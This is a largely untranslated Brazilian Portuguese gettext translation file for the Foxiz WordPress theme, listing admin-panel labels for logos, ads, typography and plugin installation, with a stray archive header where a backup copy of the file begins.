msgid "" "To edit the tagline typography, navigate to \"Typography > Headline & " "Tagline > Single Tagline\"." msgstr "" #: backend/panels/header.php:315 msgid "" "To edit the typography, navigate to \"Typography > Menu > Mobile Menu " "Settings\". Navigate to \"Social Profiles\" for the social list." msgstr "" #: backend/panels/sidebar.php:21 msgid "" "To edit the widget heading layout, navigate to \"Heading Design > Sidebar " "Widget Heading\"." msgstr "" #: backend/class-tgm-plugin-activation.php:2486 #, php-format msgid "To Install (%s)" msgstr "" #: backend/panels/amp.php:132 msgid "" "To setup the copyright area, Please navigate to Footer > Copyright Section." msgstr "" #: backend/panels/single-post.php:1260 msgid "" "To use the shortcode, read the documentation \"Related Box Shortcode\" for " "further information." msgstr "" #: backend/panels/header.php:203 msgid "Toggle Mode" msgstr "" #: backend/panels/general.php:17 msgid "Tooltips" msgstr "" #: backend/configs.php:376 msgid "Top" msgstr "" #: backend/panels/blog-pages.php:643 msgid "Top & Bottom Area Template Builder" msgstr "" #: backend/panels/header-style.php:618 msgid "Top & Bottom Border" msgstr "" #: backend/configs.php:377 msgid "Top (Big Icon)" msgstr "" #: backend/panels/amp.php:420 msgid "Top - Ad Type" msgstr "" #: backend/panels/amp.php:448 msgid "Top - Adsense Size" msgstr "" #: backend/panels/amp.php:460 msgid "Top - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:432 msgid "Top - Data Ad Client" msgstr "" #: backend/panels/amp.php:440 msgid "Top - Data Ad Slot" msgstr "" #: backend/category-settings.php:129 backend/panels/blog-pages.php:649 msgid "Top Area Template Shortcode" msgstr "" #: backend/panels/footer.php:53 msgid "Top Border" msgstr "" #: backend/single-metaboxes.php:681 msgid "Top Entry Widgets Area" msgstr "" #: includes/menu.php:302 msgid "Top News" msgstr "" #: backend/panels/single-post.php:706 msgid "Top Share Bar" msgstr "" #: backend/panels/amp.php:414 msgid "Top Single Content Ad Settings" msgstr "" #: backend/panels/ads.php:77 backend/panels/privacy.php:25 msgid "Top Site" msgstr "" #: backend/single-metaboxes.php:142 backend/single-metaboxes.php:919 msgid "Top Site Advert" msgstr "" #: backend/category-settings.php:124 backend/panels/blog-pages.php:114 msgid "Top Template Builder" msgstr "" #: backend/panels/woocommerce.php:147 msgid "Total Related Products" msgstr "" #: backend/configs.php:80 msgid "Transparent - Style 1" msgstr "" #: backend/configs.php:81 msgid "Transparent - Style 2" msgstr "" #: backend/configs.php:82 msgid "Transparent - Style 3" msgstr "" #: backend/panels/header-style.php:262 msgid "Transparent Colors" msgstr "" #: backend/panels/logo.php:125 msgid "Transparent Logo" msgstr "" #: backend/panels/logo.php:115 msgid "Transparent Logos" msgstr "" #: backend/panels/logo.php:133 msgid "Transparent Retina Logo" msgstr "" #: backend/panels/header.php:547 msgid "Trigger Button Layout" msgstr "" #: backend/panels/single-post.php:768 backend/panels/single-post.php:907 #: backend/panels/single-post.php:1045 backend/panels/single-post.php:1673 #: templates/parts.php:609 msgid "Tumblr" msgstr "" #: backend/panels/socials.php:68 msgid "Tumblr URL " msgstr "" #: backend/panels/single-post.php:732 backend/panels/single-post.php:871 #: backend/panels/single-post.php:1009 backend/panels/single-post.php:1641 #: templates/parts.php:594 msgid "Twitter" msgstr "" #: backend/panels/socials.php:35 msgid "Twitter URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2643 msgid "Type" msgstr "" #: backend/panels/typography.php:13 msgid "Typography" msgstr "" #: backend/panels/single-post.php:245 msgid "Underline Color" msgstr "" #: bookmark/bookmark.php:57 msgid "Undo" msgstr "" #: templates/parts.php:803 msgid "Unfollow" msgstr "" #: backend/class-tgm-plugin-activation.php:2576 msgid "unknown" msgstr "" #: backend/panels/sidebar.php:37 msgid "Unlimited Sidebars" msgstr "" #: backend/class-tgm-plugin-activation.php:2817 msgid "Update" msgstr "" #: backend/configs.php:408 backend/panels/design.php:274 msgid "update (Last Updated)" msgstr "atualização (última atualização)" #: backend/class-tgm-plugin-activation.php:2702 #, php-format msgid "Update %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:2490 #, php-format msgid "Update Available (%s)" msgstr "" #: backend/class-tgm-plugin-activation.php:2427 msgid "Update recommended" msgstr "" #: backend/class-tgm-plugin-activation.php:616 msgid "Update Required" msgstr "" #: templates/single/templates.php:456 msgid "Updated" msgstr "Atualizado" #: backend/panels/design.php:117 msgid "Updated Date Icon" msgstr "" #: backend/class-tgm-plugin-activation.php:3592 #, php-format msgid "Updating Plugin %1$s (%2$d/%3$d)" msgstr "" #: backend/class-tgm-plugin-activation.php:344 #, php-format msgid "Updating Plugin: %s" msgstr "" #: backend/class-tgm-plugin-activation.php:2778 msgid "Upgrade message from the plugin author:" msgstr "" #: backend/single-metaboxes.php:535 msgid "Upload a background header image for this review section." msgstr "" #: backend/panels/blog-pages.php:1983 msgid "Upload a background image for the search header in the dark mode." msgstr "" #: backend/panels/blog-pages.php:1969 msgid "Upload a background image for the search header." msgstr "" #: backend/panels/blog-pages.php:2399 msgid "Upload a header image for the 404 page in the dark mode." msgstr "" #: backend/panels/blog-pages.php:2391 msgid "Upload a header image for the 404 page." msgstr "" #: backend/panels/bookmark.php:129 backend/panels/bookmark.php:472 msgid "Upload a image for displaying at the top heading in the dark mode." msgstr "" #: backend/panels/bookmark.php:121 backend/panels/bookmark.php:464 msgid "Upload a image for displaying at the top heading. Image height is 60px." msgstr "" #: backend/panels/logo.php:126 msgid "" "Upload a light logo for transparent headers. Recommended logo height value " "is 60px, allowed extensions are .jpg, .png and .gif." msgstr "" #: backend/panels/logo.php:104 msgid "" "Upload a light retina logo for displaying in mobile device. It should be " "same dimensions with the mobile logo." msgstr "" #: backend/panels/logo.php:134 msgid "" "Upload a light retina logo for transparent headers. Recommended logo height " "value is 120px." msgstr "" #: backend/panels/logo.php:96 msgid "" "Upload a logo for the mobile device. Recommended logo height value is 84px, " "allowed extensions are .jpg, .png and .gif" msgstr "" #: backend/panels/footer.php:153 msgid "" "Upload a small dark logo to display at bottom of the footer in the dark mode." msgstr "" #: backend/panels/footer.php:145 msgid "Upload a small logo to display at bottom of the footer." msgstr "" #: backend/panels/amp.php:92 msgid "Upload AMP footer logo." msgstr "" #: backend/category-settings.php:87 msgid "Upload featured images (maximum: 2 images) for this category." msgstr "" #: backend/single-metaboxes.php:433 msgid "Upload Gallery" msgstr "" #: backend/panels/logo.php:160 msgid "" "Upload icon for the Apple touch (72 x 72px), allowed extensions are .jpg, ." "png, .gif" msgstr "" #: backend/panels/logo.php:168 msgid "" "Upload icon for the Metro interface (144 x 144px), allowed extensions are ." "jpg, .png, .gif" msgstr "" #: backend/single-metaboxes.php:643 msgid "" "Upload the sponsor light logo for this post, recommended height for the logo " "is 52px." msgstr "" #: backend/single-metaboxes.php:637 msgid "" "Upload the sponsor logo for this post, recommended height for the logo is " "52px." msgstr "" #: backend/panels/ads.php:187 backend/panels/ads.php:376 msgid "Upload your ad image in the dark mode." msgstr "" #: backend/panels/ads.php:180 backend/panels/ads.php:369 msgid "Upload your ad image." msgstr "" #: backend/single-metaboxes.php:399 msgid "Upload your audio file, support: mp3, ogg, wma, m4a, wav files." msgstr "" #: backend/panels/login.php:67 msgid "Upload your background for the logo screen." msgstr "" #: backend/single-metaboxes.php:434 msgid "Upload your images for this gallery." msgstr "" #: backend/panels/login.php:52 msgid "" "Upload your logo for the logo screen. This option will override on wordpress " "logo." msgstr "" #: backend/single-metaboxes.php:339 msgid "" "Upload your preview video. Keep video short and lightweight as possible to " "save server bandwidth." msgstr "" #: backend/single-metaboxes.php:351 msgid "Upload your video file, support: mp4, m4v, webm, ogv, wmv, flv files." msgstr "" #: backend/panels/ads.php:124 backend/panels/ads.php:313 msgid "Use Adsense units code to ensure it display exactly where you put." msgstr "" #: backend/configs.php:359 msgid "Use Custom" msgstr "" #: backend/category-settings.php:105 backend/panels/blog-pages.php:1225 #: backend/panels/breadcrumb.php:54 backend/panels/breadcrumb.php:65 #: backend/panels/breadcrumb.php:76 backend/panels/breadcrumb.php:87 #: backend/panels/breadcrumb.php:98 backend/panels/page.php:85 #: backend/panels/single-post.php:452 msgid "Use Global Setting" msgstr "" #: backend/configs.php:223 msgid "Use Post Excerpt" msgstr "" #: backend/configs.php:86 backend/panels/footer.php:98 msgid "Use Ruby Template" msgstr "" #: backend/panels/header-style.php:114 backend/panels/header-style.php:402 #: backend/panels/header-style.php:439 backend/panels/header-style.php:669 #: backend/panels/header.php:410 msgid "use the option \"To\" to set a gradient background." msgstr "" #: backend/configs.php:224 msgid "Use Title Tagline" msgstr "" #: backend/panels/sidebar.php:49 msgid "" "Useful when a sidebar is too tall or too short compared to the rest of the " "content." msgstr "" #: backend/panels/header.php:609 msgid "User Dashboard Menu" msgstr "" #: backend/panels/bookmark.php:438 msgid "User Interests" msgstr "" #: backend/panels/single-post.php:1175 backend/panels/single-post.php:1219 #: backend/single-metaboxes.php:483 msgid "User Rating in Comments" msgstr "" #: backend/panels/reaction.php:16 backend/single-metaboxes.php:839 msgid "User Reaction" msgstr "" #: templates/single/reviews.php:242 msgid "User Votes" msgstr "" #: backend/class-tgm-plugin-activation.php:2647 msgid "Version" msgstr "" #: backend/configs.php:849 msgid "Vertical Banner (120 x 240)" msgstr "" #: templates/single/review-comment.php:94 msgid "Very Poor" msgstr "" #: backend/panels/single-post.php:312 msgid "Via Bar" msgstr "" #: backend/single-metaboxes.php:799 msgid "Via Name" msgstr "" #: backend/single-metaboxes.php:804 msgid "Via URL" msgstr "" #: templates/single/templates.php:701 msgid "VIA:" msgstr "Via:" #: backend/single-metaboxes.php:316 msgid "Video Format" msgstr "" #: backend/panels/design.php:477 msgid "Video Icon" msgstr "" #: backend/panels/design.php:498 msgid "Video Icon Color" msgstr "" #: backend/single-metaboxes.php:322 msgid "Video Layout" msgstr "" #: backend/panels/single-post.php:60 msgid "Video Post Format Layout" msgstr "" #: backend/panels/single-post.php:66 msgid "Video Post Layout" msgstr "" #: backend/single-metaboxes.php:331 msgid "Video URL" msgstr "" #: backend/configs.php:406 backend/panels/design.php:272 msgid "view (Post Views)" msgstr "" #: templates/header/templates.php:905 msgid "View Cart" msgstr "" #: templates/parts.php:636 msgid "Vimeo" msgstr "" #: backend/panels/socials.php:122 msgid "Vimeo URL " msgstr "" #: backend/panels/single-post.php:786 backend/panels/single-post.php:925 #: backend/panels/single-post.php:1063 backend/panels/single-post.php:1689 #: templates/parts.php:642 msgid "Vkontakte" msgstr "" #: backend/panels/socials.php:134 msgid "VKontakte URL " msgstr "" #: templates/single/reviews.php:245 msgid "vote" msgstr "" #: templates/single/reviews.php:247 msgid "votes" msgstr "" #: backend/panels/general.php:56 msgid "" "We recommend you should create a backup before updating or major changes." msgstr "" #: backend/panels/optimized.php:21 #, php-format msgid "" "We recommend you to refer this " "DOCUMENTATION to optimize for you website" msgstr "" #: templates/parts.php:588 msgid "Website" msgstr "" #: backend/panels/typography.php:27 msgid "Website Body" msgstr "" #: backend/panels/header.php:560 msgid "Welcome Back!" msgstr "" #: templates/single/templates.php:753 msgid "What do you think?" msgstr "O que você acha?" #: backend/panels/single-post.php:1348 msgid "What posts should be displayed in the related section." msgstr "" #: backend/panels/single-post.php:750 backend/panels/single-post.php:889 #: backend/panels/single-post.php:1027 backend/panels/single-post.php:1657 #: templates/parts.php:648 msgid "WhatsApp" msgstr "" #: backend/panels/socials.php:146 msgid "Whatsapp URL " msgstr "" #: backend/category-settings.php:418 backend/panels/block-classic.php:99 #: backend/panels/block-grid.php:99 backend/panels/block-grid.php:264 #: backend/panels/block-grid.php:429 backend/panels/block-grid.php:602 #: backend/panels/block-grid.php:789 backend/panels/block-list.php:107 #: backend/panels/block-list.php:280 backend/panels/block-list.php:461 #: backend/panels/block-list.php:656 backend/panels/blog-pages.php:444 #: backend/panels/blog-pages.php:931 backend/panels/blog-pages.php:1345 #: backend/panels/blog-pages.php:1753 backend/panels/blog-pages.php:2245 #: backend/panels/bookmark.php:343 backend/panels/bookmark.php:791 msgid "" "When you select \"use title tagline\". if it is empty, it will fallback to " "the post excerpt or content." msgstr "" #: backend/category-settings.php:417 backend/panels/block-classic.php:98 #: backend/panels/block-grid.php:98 backend/panels/block-grid.php:263 #: backend/panels/block-grid.php:428 backend/panels/block-grid.php:601 #: backend/panels/block-grid.php:788 backend/panels/block-list.php:106 #: backend/panels/block-list.php:279 backend/panels/block-list.php:460 #: backend/panels/block-list.php:655 backend/panels/blog-pages.php:443 #: backend/panels/blog-pages.php:930 backend/panels/blog-pages.php:1344 #: backend/panels/blog-pages.php:1752 backend/panels/blog-pages.php:2244 #: backend/panels/bookmark.php:342 backend/panels/bookmark.php:790 msgid "Where to get the post excerpt." msgstr "" #: backend/configs.php:847 msgid "Wide Skyscraper (160x600)" msgstr "" #: backend/panels/sidebar.php:55 msgid "Widget Block Editor" msgstr "" #: backend/panels/heading.php:112 msgid "Widget Heading HTML Tag" msgstr "" #: backend/panels/heading.php:95 msgid "Widget Heading Layout" msgstr "" #: backend/panels/footer.php:113 msgid "Widget Menu Font Size" msgstr "" #: backend/panels/single-post.php:165 msgid "Width Settings" msgstr "" #: backend/panels/reaction.php:48 msgid "Wink" msgstr "" #: backend/panels/woocommerce.php:28 msgid "WooCommerce" msgstr "" #: backend/panels/woocommerce.php:44 msgid "WooCommerce Pages" msgstr "" #: backend/panels/woocommerce.php:15 msgid "" "Woocommerce plugin not found! Please install and active Woocommerce to active settings " "below." msgstr "" #: backend/class-tgm-plugin-activation.php:2386 msgid "WordPress Repository" msgstr "" #: backend/panels/design.php:354 msgid "" "WordPress will crop uploaded images to ensure your website use the best " "image size for the blog layouts." msgstr "" #: backend/panels/design.php:165 msgid "Words per Minute" msgstr "" #: backend/panels/header-style.php:60 backend/panels/header-style.php:354 #: backend/panels/header-style.php:606 msgid "Wrapper (1240px)" msgstr "" #: backend/panels/optimized.php:91 msgid "Write CSS to file to reduce CPU usage and reduce the load time." msgstr "" #: backend/panels/heading.php:23 msgid "" "You can also choose layouts and colors for individual heading the page " "builder." msgstr "" #: backend/panels/typography.php:84 msgid "" "You can control the excerpt font sizes in this panel. The font family and " "other font values will base on \"Body Font\" values." msgstr "" #: backend/panels/dark-mode.php:24 msgid "" "You can set custom dark mode background in \"Global Colors > Dark Mode " "Background\"." msgstr "" #: bookmark/templates.php:60 msgid "You haven't saved anything yet." msgstr "" #: templates/single/footer.php:50 msgid "You Might Also Like" msgstr "Você pode gostar também" #: backend/panels/bookmark.php:113 msgid "you'll find all saved articles here." msgstr "" #: templates/ajax.php:128 msgid "You've reached the end of the list!" msgstr "" #: backend/panels/bookmark.php:449 msgid "Your Categories" msgstr "" #: templates/single/review-comment.php:97 msgid "Your comment" msgstr "" #: templates/single/review-comment.php:63 msgid "Your Email" msgstr "Seu email" #: includes/actions.php:47 msgid "Your email" msgstr "Seu email" #: includes/actions.php:44 templates/single/review-comment.php:57 msgid "Your name" msgstr "Seu nome" #: templates/single/review-comment.php:87 msgid "Your Rating" msgstr "" #: templates/single/templates.php:942 msgid "Your review is awaiting moderation." msgstr "" #: templates/single/templates.php:944 msgid "" "Your review is awaiting moderation. This is a preview, your review will be " "visible after it has been approved." msgstr "" #: includes/actions.php:51 msgid "Your Website" msgstr "Seu site" #: templates/single/review-comment.php:69 msgid "Your website" msgstr "Seu site" #: templates/parts.php:597 msgid "YouTube" msgstr "" #: backend/panels/socials.php:42 msgid "Youtube URL " msgstr "" #: backend/panels/newsletter.php:57 msgid "Zero spam, Unsubscribe at any time." msgstr "" PK!<*wYY*languages/pt_BR-backup-202209020001080.po~nu[msgid "" msgstr "" "Project-Id-Version: Foxiz\n" "POT-Creation-Date: 2022-05-18 13:30+0700\n" "PO-Revision-Date: 2022-09-02 00:00+0000\n" "Last-Translator: \n" "Language-Team: Português do Brasil\n" "Language: pt_BR\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" "X-Generator: Loco https://localise.biz/\n" "X-Poedit-Basepath: ..\n" "Plural-Forms: nplurals=2; plural=n != 1;\n" "X-Poedit-SourceCharset: UTF-8\n" "X-Poedit-KeywordsList: _x;__;_e;_nx:1,2;esc_html__;esc_html_e;esc_attr__;" "esc_attr_e;foxiz_html__;foxiz_attr__;foxiz_html_e;foxiz_attr_e;_n;_nx;" "_n_noop\n" "X-Poedit-SearchPath-0: .\n" "X-Poedit-SearchPathExcluded-0: *.js\n" "Report-Msgid-Bugs-To: \n" "X-Loco-Version: 2.6.2; wp-6.0.2" #: templates/blog.php:498 msgid " Get started here" msgstr "" #: backend/panels/page.php:30 msgid " Page Header Style" msgstr "" #: backend/panels/footer.php:83 msgid "" "\"Column Border\" and \"Widget Menu Font Size\" and \"Text Color Scheme\" " "will not apply to Ruby template shortcode." msgstr "" #: backend/panels/design.php:103 backend/panels/single-post.php:592 msgid "\"Posted\" Author Label" msgstr "" #: backend/class-tgm-plugin-activation.php:3603 #, php-format msgid "%1$s installed and activated successfully." msgstr "" #: backend/class-tgm-plugin-activation.php:3611 #, php-format msgid "%1$s installed successfully." msgstr "" #: backend/class-tgm-plugin-activation.php:2436 #, php-format msgid "%1$s, %2$s" msgstr "" #: templates/entry.php:320 #, php-format msgid "%s ago" msgstr "" #: templates/single/templates.php:910 #, php-format msgid "%s Comments" msgstr "%s Comentários" #: templates/entry.php:557 #, php-format msgid "%s comments" msgstr "%s comentários" #: templates/entry.php:692 #, php-format msgid "%s Min Read" msgstr "" #: templates/single/reviews.php:54 #, php-format msgid "%s out of 10" msgstr "" #: templates/single/reviews.php:97 #, php-format msgid "%s out of 5" msgstr "" #: templates/single/templates.php:886 #, php-format msgid "%s Reviews" msgstr "" #: templates/entry.php:619 #, php-format msgid "%s Views" msgstr "" #: comments.php:25 msgid "← Older Comments" msgstr "" #: backend/single-metaboxes.php:753 msgid "+Add Heading" msgstr "" #: backend/single-metaboxes.php:208 msgid "+Add Highlight" msgstr "" #: backend/single-metaboxes.php:775 msgid "+Add Post Source" msgstr "" #: backend/single-metaboxes.php:796 msgid "+Add Post Via" msgstr "" #: backend/panels/ads.php:412 msgid "- Advertisement -" msgstr "" #: backend/panels/header.php:612 msgid "- Assign a Menu -" msgstr "" #: backend/category-settings.php:104 backend/category-settings.php:116 #: backend/category-settings.php:142 backend/category-settings.php:242 #: backend/category-settings.php:315 backend/category-settings.php:349 #: backend/category-settings.php:401 backend/configs.php:46 #: backend/configs.php:71 backend/configs.php:106 backend/configs.php:161 #: backend/configs.php:195 backend/configs.php:209 backend/configs.php:236 #: backend/configs.php:288 backend/configs.php:319 backend/configs.php:357 #: backend/configs.php:373 backend/configs.php:424 backend/configs.php:499 #: backend/configs.php:524 backend/configs.php:542 backend/configs.php:559 #: backend/configs.php:583 backend/configs.php:607 backend/configs.php:634 #: backend/configs.php:693 backend/configs.php:732 backend/configs.php:771 #: backend/configs.php:801 backend/configs.php:822 backend/mega-menu.php:139 #: backend/mega-menu.php:150 backend/panels/blog-pages.php:324 #: backend/panels/blog-pages.php:493 backend/panels/blog-pages.php:523 #: backend/panels/blog-pages.php:811 backend/panels/blog-pages.php:980 #: backend/panels/blog-pages.php:1010 backend/panels/blog-pages.php:1394 #: backend/panels/blog-pages.php:1424 backend/panels/blog-pages.php:1633 #: backend/panels/blog-pages.php:1802 backend/panels/blog-pages.php:1832 #: backend/panels/blog-pages.php:2125 backend/panels/blog-pages.php:2294 #: backend/panels/blog-pages.php:2324 backend/panels/bookmark.php:227 #: backend/panels/bookmark.php:392 backend/panels/bookmark.php:414 #: backend/panels/bookmark.php:675 backend/panels/bookmark.php:840 #: backend/panels/bookmark.php:870 backend/panels/design.php:578 #: backend/panels/design.php:595 backend/single-metaboxes.php:60 #: backend/single-metaboxes.php:73 backend/single-metaboxes.php:132 #: backend/single-metaboxes.php:223 backend/single-metaboxes.php:360 #: backend/single-metaboxes.php:408 backend/single-metaboxes.php:487 #: backend/single-metaboxes.php:507 backend/single-metaboxes.php:652 #: backend/single-metaboxes.php:714 backend/single-metaboxes.php:726 #: backend/single-metaboxes.php:824 backend/single-metaboxes.php:843 #: backend/single-metaboxes.php:862 backend/single-metaboxes.php:874 #: backend/single-metaboxes.php:909 msgid "- Default -" msgstr "" #: backend/configs.php:253 backend/mega-menu.php:168 #: backend/panels/bookmark.php:573 backend/panels/login.php:29 msgid "- Disable -" msgstr "" #: backend/panels/login.php:40 msgid "- Left -" msgstr "" #: backend/mega-menu.php:184 msgid "- Select Columns -" msgstr "" #: backend/panels/amp.php:303 backend/panels/amp.php:363 #: backend/panels/amp.php:423 backend/panels/amp.php:484 #: backend/panels/amp.php:544 msgid "-- Adsense --" msgstr "" #: backend/single-metaboxes.php:476 backend/single-metaboxes.php:615 msgid "-- Disable --" msgstr "" #: backend/panels/amp.php:331 backend/panels/amp.php:391 #: backend/panels/amp.php:451 backend/panels/amp.php:512 #: backend/panels/amp.php:572 msgid "-- Responsive --" msgstr "" #: backend/mega-menu.php:128 msgid "-Disable-" msgstr "" #: backend/configs.php:500 backend/mega-menu.php:47 msgid "1 Column" msgstr "" #: templates/single/templates.php:912 msgid "1 Comment" msgstr "1 Comentário" #: templates/entry.php:555 msgid "1 comment" msgstr "1 comentário" #: backend/panels/ads.php:480 backend/panels/newsletter.php:80 msgid "1 Day" msgstr "" #: backend/panels/ads.php:486 backend/panels/newsletter.php:86 msgid "1 Month" msgstr "" #: templates/single/templates.php:888 msgid "1 Review" msgstr "" #: templates/entry.php:617 msgid "1 View" msgstr "" #: backend/panels/ads.php:483 backend/panels/newsletter.php:83 msgid "1 Week" msgstr "" #: backend/configs.php:526 msgid "10px" msgstr "" #: backend/configs.php:527 msgid "14px" msgstr "" #: backend/panels/ads.php:241 msgid "15px" msgstr "" #: backend/configs.php:501 backend/mega-menu.php:48 #: backend/panels/header.php:130 msgid "2 Columns" msgstr "" #: backend/panels/ads.php:481 backend/panels/newsletter.php:81 msgid "2 Days" msgstr "" #: backend/panels/ads.php:484 backend/panels/newsletter.php:84 msgid "2 Weeks" msgstr "" #: backend/configs.php:528 msgid "20px" msgstr "" #: backend/configs.php:502 backend/mega-menu.php:49 #: backend/panels/header.php:131 msgid "3 Columns" msgstr "" #: backend/panels/footer.php:97 msgid "3 Columns (1/2/1)" msgstr "" #: backend/panels/ads.php:482 backend/panels/newsletter.php:82 msgid "3 Days" msgstr "" #: backend/panels/ads.php:485 backend/panels/newsletter.php:85 msgid "3 Weeks" msgstr "" #: backend/configs.php:529 msgid "30px" msgstr "" #: backend/configs.php:503 backend/mega-menu.php:50 #: backend/panels/header.php:132 msgid "4 Columns" msgstr "" #: backend/panels/footer.php:94 msgid "4 Columns (3/2/2/3)" msgstr "" #: backend/panels/ads.php:432 msgid "4,9" msgstr "" #: backend/panels/blog-pages.php:2375 msgid "404 Page" msgstr "" #: backend/configs.php:530 msgid "40px" msgstr "" #: backend/configs.php:504 backend/mega-menu.php:51 #: backend/panels/header.php:133 msgid "5 Columns" msgstr "" #: backend/panels/footer.php:95 msgid "5 Columns (1/1/1/1/1)" msgstr "" #: backend/panels/footer.php:96 msgid "5 Columns (40/15/15/15/15)" msgstr "" #: backend/configs.php:531 msgid "50px" msgstr "" #: backend/configs.php:505 msgid "6 Columns" msgstr "" #: backend/configs.php:532 msgid "60px" msgstr "" #: backend/configs.php:506 msgid "7 Columns" msgstr "" #: backend/configs.php:533 msgid "70px" msgstr "" #: backend/panels/newsletter.php:50 msgid "[mc4wp_form]" msgstr "" #: backend/panels/ads.php:471 backend/panels/blog-pages.php:63 #: backend/panels/blog-pages.php:629 backend/panels/blog-pages.php:1947 #: backend/panels/footer.php:121 backend/panels/header.php:62 msgid "[Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/footer.php:47 msgid "A dotted area for display at the left of the footer." msgstr "" #: includes/sidebars.php:58 msgid "A sidebar section of your site." msgstr "" #: templates/header/templates.php:758 msgid "Aa" msgstr "" #: backend/panels/heading.php:57 backend/panels/heading.php:142 msgid "Accent Heading Color" msgstr "" #: templates/popup.php:27 msgid "Accept" msgstr "Aceitar" #: backend/class-tgm-plugin-activation.php:2820 msgid "Activate" msgstr "" #: backend/class-tgm-plugin-activation.php:2708 #, php-format msgid "Activate %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:2415 msgid "Active" msgstr "" #: backend/panels/ads.php:416 msgid "Ad Align" msgstr "" #: backend/panels/ads.php:409 msgid "Ad Description" msgstr "" #: backend/panels/ads.php:92 backend/panels/ads.php:97 #: backend/panels/ads.php:280 backend/panels/ads.php:285 msgid "Ad Type" msgstr "" #: backend/panels/adblock.php:29 msgid "AdBlock Detected" msgstr "" #: backend/panels/adblock.php:13 backend/panels/adblock.php:19 msgid "AdBlock Detector" msgstr "" #: templates/entry.php:553 msgid "Add a Comment" msgstr "" #: backend/panels/design.php:328 msgid "Add a Crop Size" msgstr "" #: backend/panels/newsletter.php:63 msgid "Add a link for the footer text (optional)." msgstr "" #: backend/panels/single-post.php:1403 msgid "Add a ruby template shortcode you would like to in this section.." msgstr "" #: backend/panels/sidebar.php:38 msgid "Add a Sidebar ID" msgstr "" #: backend/single-metaboxes.php:515 msgid "Add Criteria" msgstr "" #: templates/modules/category.php:20 msgid "Add More" msgstr "" #: backend/panels/woocommerce.php:228 msgid "Add to Cart Color" msgstr "" #: backend/panels/header.php:581 msgid "Adding a custom logo for the login form in the dark mode." msgstr "" #: backend/panels/header.php:573 msgid "" "Adding a custom logo for the login form. Leave blank to set it as the " "default." msgstr "" #: backend/panels/socials.php:16 msgid "Adding social profiles for your website." msgstr "" #: backend/panels/login.php:140 msgid "Admin Bar" msgstr "" #: backend/panels/ads.php:15 msgid "Ads & Slide Up" msgstr "" #: backend/panels/ads.php:30 msgid "Adsense - Auto Ads" msgstr "" #: backend/single-metaboxes.php:554 msgid "advantage item" msgstr "" #: backend/single-metaboxes.php:546 msgid "Advantages" msgstr "" #: backend/configs.php:378 msgid "After Entry Category" msgstr "" #: templates/entry.php:651 msgid "Ago" msgstr "" #: backend/panels/blog-pages.php:1510 msgid "" "Ajax pagination is only available for the tag. The theme will fallback to " "the numeric type for other archive pages." msgstr "" #: backend/panels/header.php:636 backend/panels/header.php:651 msgid "Alert Bar" msgstr "" #: backend/panels/header.php:666 msgid "Alert Content" msgstr "" #: backend/panels/header.php:673 msgid "Alert URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2482 #, php-format msgid "All (%s)" msgid_plural "All (%s)" msgstr[0] "" msgstr[1] "" #: backend/class-tgm-plugin-activation.php:3604 msgid "All installations and activations have been completed." msgstr "" #: backend/class-tgm-plugin-activation.php:3612 msgid "All installations have been completed." msgstr "" #: backend/class-tgm-plugin-activation.php:406 #, php-format msgid "All plugins installed and activated successfully. %1$s" msgstr "" #: backend/install-plugins.php:82 #, php-format msgid "All plugins installed and activated successfully. %s" msgstr "" #: backend/panels/ads.php:430 backend/panels/amp.php:590 msgid "Allow multiple positions, separated by commas. For example: 4,9" msgstr "" #: backend/panels/bookmark.php:52 msgid "Allow or disallow guest users can bookmark posts." msgstr "" #: backend/panels/ads.php:487 msgid "Always Display" msgstr "" #: backend/panels/amp.php:28 msgid "AMP" msgstr "" #: backend/panels/amp.php:277 msgid "AMP Ads" msgstr "" #: backend/panels/amp.php:247 msgid "AMP Auto Ads" msgstr "" #: backend/panels/amp.php:261 msgid "AMP Auto Ads Code" msgstr "" #: backend/panels/amp.php:304 backend/panels/amp.php:364 #: backend/panels/amp.php:424 backend/panels/amp.php:485 #: backend/panels/amp.php:545 msgid "AMP Custom Script Ad" msgstr "" #: backend/panels/amp.php:62 msgid "AMP Debug" msgstr "" #: backend/panels/amp.php:91 msgid "AMP Footer Logo" msgstr "" #: backend/panels/header.php:244 msgid "AMP Header - Search Icon" msgstr "" #: backend/panels/amp.php:83 msgid "amp_footer Settings" msgstr "" #: backend/class-tgm-plugin-activation.php:3595 #, php-format msgid "An error occurred while installing %1$s: %2$s." msgstr "" #: backend/panels/reaction.php:46 msgid "Angry" msgstr "" #: backend/panels/typography.php:1096 msgid "Archive & Menu Widgets" msgstr "" #: backend/panels/breadcrumb.php:94 msgid "Archive Breadcrumb" msgstr "" #: backend/panels/blog-pages.php:1487 msgid "Archive Header" msgstr "" #: backend/panels/woocommerce.php:116 msgid "Archive Sidebar Name" msgstr "" #: backend/panels/woocommerce.php:108 msgid "Archive Sidebar Position" msgstr "" #: templates/blog.php:476 templates/modules/category.php:74 #: templates/modules/category.php:134 templates/modules/category.php:197 #: templates/modules/category.php:270 templates/modules/category.php:337 msgid "Article" msgstr "" #: backend/panels/optimized.php:152 msgid "Article Markup" msgstr "" #: backend/single-metaboxes.php:858 msgid "Article Schema Markup" msgstr "" #: templates/blog.php:478 templates/modules/category.php:72 #: templates/modules/category.php:132 templates/modules/category.php:195 #: templates/modules/category.php:268 templates/modules/category.php:335 msgid "Articles" msgstr "Postagens" #: backend/panels/header.php:610 msgid "" "Assign a menu for displaying when hovering on the login icon if user logged." msgstr "" #: backend/category-settings.php:303 backend/panels/blog-pages.php:313 #: backend/panels/blog-pages.php:800 backend/panels/blog-pages.php:1214 #: backend/panels/blog-pages.php:1622 backend/panels/blog-pages.php:2114 #: backend/panels/bookmark.php:216 backend/panels/bookmark.php:664 #: backend/panels/page.php:74 backend/panels/single-post.php:433 #: backend/panels/single-post.php:1457 backend/single-metaboxes.php:97 #: backend/single-metaboxes.php:456 msgid "Assign a Sidebar" msgstr "" #: backend/single-metaboxes.php:98 msgid "" "Assign a sidebar for this page. It will override on the default settings in " "the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:457 msgid "" "Assign a sidebar for this post. It will override on the default settings in " "the Theme Options panel." msgstr "" #: backend/panels/single-post.php:434 msgid "" "Assign a sidebar if you select a single layout which has the sidebar. You " "can set an 